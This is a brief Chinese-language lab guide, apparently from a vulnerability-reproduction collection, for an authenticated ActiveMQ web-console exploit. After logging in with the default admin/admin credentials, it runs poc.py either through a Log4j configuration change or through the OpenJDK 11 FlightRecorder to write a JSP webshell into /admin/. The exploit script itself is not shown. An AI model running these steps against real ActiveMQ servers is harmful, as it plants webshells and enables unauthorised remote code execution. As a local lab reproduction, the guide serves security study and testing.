执行docker compose up -d
启动容器
访问ip:8161
默认账密admin/admin登录后台
复现方法1:
通过修改 Log4j 配置写入任意文件
执行python3 poc.py -u admin -p admin http://your-ip:8161
将webshell写入http://your-ip:8161/admin/shell.jsp
可访问路径验证是否成功
方法 1 受 ActiveMQ 版本限制(需包含 Log4j2)
复现方法2:
该方法利用 OpenJDK 11 引入的 FlightRecorder 特性写入日志文件,适用范围更广
执行python3 poc.py -u admin -p admin --exploit jfr http://your-ip:8161
将webshell写入http://your-ip:8161/admin/shelljfr.jsp
可访问路径验证是否成功
方法 2 依赖 OpenJDK 11 及以上环境